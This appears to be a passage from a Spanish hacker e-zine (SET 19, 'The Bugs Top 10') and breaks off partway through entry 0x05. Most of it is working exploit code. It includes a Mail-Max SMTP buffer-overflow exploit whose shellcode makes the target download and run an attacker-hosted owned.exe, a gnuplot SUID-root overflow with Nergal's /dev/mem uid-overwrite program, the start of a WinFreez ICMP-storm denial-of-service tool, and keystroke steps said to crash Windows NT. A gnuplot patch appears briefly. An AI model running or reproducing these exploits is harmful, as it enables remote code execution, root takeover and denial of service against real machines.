-[ 0x09 ]-------------------------------------------------------------------- -[ THE BUGS TOP 10 ]--------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-19- -( 0x01 )- Para : Windows NT Tema : Cuelgue total Patch : XDDDD Creditos : Ingenius - Mensaje enviado por Zaldivar Descripcion y Notas: -----Mensaje original----- De: Ingenius N.N. Bien paso a explicar 1 - Abra un ventata de dos 2 - Precione la tacla TAB hasta que desaparesca todo lo que halla en la pantalla o hasta que haga ruido de que no da para mas. 3 - Precione la tecla Backspace hasta que cuelge si no cuelta despues de un rato no cuelga y uds a tenido apretada la tecla Backspace, sueltela y preciones la tecla ENTER y listo pantalla azul de aquellas Esto lo probe con NT Workstation 4.0 con SP3, seguro que con Server tiene que andar Saludos Ingenius N.N. -( 0x02 )- Para : Mail-Max SMTP Server for Windows 95/98/NT Tema : Acceso no autorizado Patch : No Microsoft, No problem Creditos : _mcp_ <++> set_019/exploits/mmax.c #include #include #include #include #include #include #include /* Mail-Max Remote Exploit by _mcp_ This program must be run under x86 Linux Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio, Wrl, #finite, #win32asm and anyone I may have missed, you know who you are :). You can reach me on efnet. No greets go out to etl. */ char code[] = "\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B" "\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56" "\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9" "\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8" "\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51" "\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83" "\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8" "\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF" "\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33" "\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75" "\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62" "\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1" "\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A" "\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50" "\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75" "\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B" "\x30\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); return(binip); } int usages(char *fname) { printf("Remote Mail-Max exploit v1.0 by _mcp_ .\n"); printf("Usages: \n"); printf("%s \n", fname); printf("All known versions offset = 539, Return address = 79887315\n"); printf("Will make target download, save, and execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,filedesc,offset,targethost,sinlen,codelength; struct sockaddr_in sin; unsigned char buffer[8000]; char ipbuffer[16]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long address; if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } offset = atoi(argv[3]); ret_addr = atol(argv[4]); if (offset > 7000) { printf("Offset too large.\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"HELO "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr+=offset; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); write(sock, &buffer, strlen((char *)&buffer) ); write(sock,"\r\n",2); sleep(1); printf("Sent the egg\n"); close(sock); exit(1); } <--> Descripcion y Notas: Volvemos a las historias de siempre, a los desbordamientos. Parece que los programadores no aprenden nunca, e incluso cada dia llegan a cometer errores aun mas grandes. No es que a ningun programador no se le pueda colar un desbordamiento en su programa. Esto es habitual, sobre todo si se trabaja en C y se tiene poca experiencia. El problema surge en situaciones como la que tiene Mail-Max. Resulta que no solo produce un desbordamiento, sino que ademas, ese codigo que incluyamos por encima de la pila puede ser ejecutable, pues segun unas determinadas circunstancias, este codigo se ejecutara. Ver para creer. -( 0x03 )- Para : Frontapge 98 & Apache 1.3.4 Tema : Tonteria Patch : Si es que frontpage... Creditos : Sitzkrieg Redundus Descripcion y Notas: Un error de los tontos. Aparentemente no se le saca provecho, pero es una curiosidad que merece la pena comentar. Resulta que al configurar el Apache 1.3.4 para que soporte las extensiones de FrontPage 98, y lanzar el httpd, se produce un error de lo mas curioso. El error proporcionado es ni mas ni menos que un error de sintaxis en la linea 1 del fichero /dev/null. Ya veis, ahora le da por jugar con los dispositivos, y no contento con eso, crea un /dev/null.bak... Alucinante. -( 0x04 )- Para : GNU Plot 3.5 Tema : SUID root Patch : quizas mas abajo Creditos : xnec / Nergal <++> set_019/exploits/xnec_plot.c /* gnuplot Linux x86 exploit from xnec tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2 gnuplot ships suidroot by default in SuSE 5.2, maybe others gcc -o xnec_plot xnec_plot.c ./xnec_plot The buffer we're overflowing is only 80 bytes, so we're going to have to get our settings just so. If you don't feel like typing in command line offsets and bufsizes, make a little shell script: --- #! /bin/bash bufsiz=110 offset=0 while [ $offset -lt 500 ]; do ./xnec_plot $bufsiz $offset offset=`expr $offset + 10` done --- since gnuplot drops root privs after it inits your svga, we can't just exec /bin/sh, we'll need to use the technique of replacing our saved uid in /dev/mem with '0', then execing whatever we please. We do this by compiling Nergal's program, mem.c and putting the output file in /tmp/xp, as in gcc -o /tmp/xp mem.c. Nergal's program will then make /tmp/sh suidroot, so don't forget to cp /bin/sh /tmp/sh. You will also have to change line 32 to the correct address of kstat, which can be obtained by doing strings /proc/ksyms | grep kstat. Since I can see absolutely no reason for gnuplot to be suidroot, the best fix is chmod -s /usr/bin/gnuplot. greets to #sk1llz, xnec on EFnet and DALnet */ #include #define DEFAULT_OFFSET 50 #define DEFAULT_BUFSIZ 110 #define NOP 0x90 #define DEFAULT_ADDR 0xbffff81c /* Aleph One's shellcode, modified to run our own program */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xp"; unsigned long getsp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buf, *ret; long *addrp, addr; int bufsiz, offset; int i; bufsiz=DEFAULT_BUFSIZ; offset=DEFAULT_OFFSET; if (argc = 2) bufsiz = atoi(argv[1]); if (argc = 3) offset = atoi(argv[2]); buf=malloc(bufsiz); addr = getsp() - offset; printf("address: 0x%x\n", addr); printf("bufsize: %d\n", bufsiz); printf("offset : %d\n", offset); ret = buf; addrp = (long *) ret; for (i = 0; i < bufsiz; i+=4) *(addrp++) = addr; memset(buf, NOP, (strlen(shellcode)/2)); ret = buf + ((bufsiz/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ret++) = shellcode[i]; buf[bufsiz - 1] = '\0'; memcpy(buf,"HOME=", 5); setenv("HOME", buf, 1); execvp("/usr/bin/gnuplot", NULL); } <--> <++> set_019/exploits/mem.c /* by Nergal */ #define SEEK_SET 0 #define __KERNEL__ #include #undef __KERNEL__ #define SIZEOF sizeof(struct task_struct) int mem_fd; int mypid; void testtask (unsigned int mem_offset) { struct task_struct some_task; int uid, pid; lseek (mem_fd, mem_offset, SEEK_SET); read (mem_fd, &some_task, SIZEOF); if (some_task.pid == mypid) /* is it our task_struct ? */ { some_task.euid = 0; some_task.fsuid = 0; /* needed for chown */ lseek (mem_fd, mem_offset, SEEK_SET); write (mem_fd, &some_task, SIZEOF); /* from now on, there is no law beyond do what thou wilt */ chown ("/tmp/sh", 0, 0); chmod ("/tmp/sh", 04755); exit (0); } } #define KSTAT 0x001a8fb8 /* <-- replace this addr with that of your kstat */ main () /* by doing strings /proc/ksyms |grep kstat */ { unsigned int i; struct task_struct *task[NR_TASKS]; unsigned int task_addr = KSTAT - NR_TASKS * 4; mem_fd = 3; /* presumed to be opened /dev/mem */ mypid = getpid (); lseek (mem_fd, task_addr, SEEK_SET); read (mem_fd, task, NR_TASKS * 4); for (i = 0; i < NR_TASKS; i++) if (task[i]) testtask ((unsigned int)(task[i])); } <--> <++> set_019/patches/gnuplot --- plot.c.old Fri Mar 5 03:17:59 1999 +++ plot.c Fri Mar 5 03:29:19 1999 @@ -516,7 +516,7 @@ char c='\0';/* character that should be added, or \0, if none */ if(tmp_home) { - strcpy(home,tmp_home); + strncpy(home,tmp_home,(sizeof(home) - 1)); if( strlen(home) ) p = &home[strlen(home)-1]; else p = home; #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) || defined(DOS386) <--> Descripcion y Notas: El error es un simple buffer overflow, de los de toda la vida. El problema surge cuando el programa se instala con SUID root por defecto, en distribuciones como la SuSe 5.2, por ejemplo. En estas circunstancias, despues de producirse el desbordamiento, se obtienen permisos de root. Toda una ganga que podemos evitar con el patch suministrado ;) Es conveniente comprobarlo, pues en distribuciones como Slackware o Debian parece que se instala correctamente, evitando el problema mencionado. Otra forma de solventar el problema en SuSe, que al parecer se trata de la unica distribucion afectada (eso si, en una version antigua), es modificar el fichero /etc/rc.config, de forma que la variable PERMISSION_SECURITY se establezca en "paranoid". -( 0x05 )- Para : Windows {95,98,NT} Tema : Congelar el sistema operativo Patch : Es bueno y es gratis... es... LINUX Creditos : Delmore <++> set_019/exploits/winfreez.c /* WinFreez.c by Delmore ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where is victim host, is router for victim host,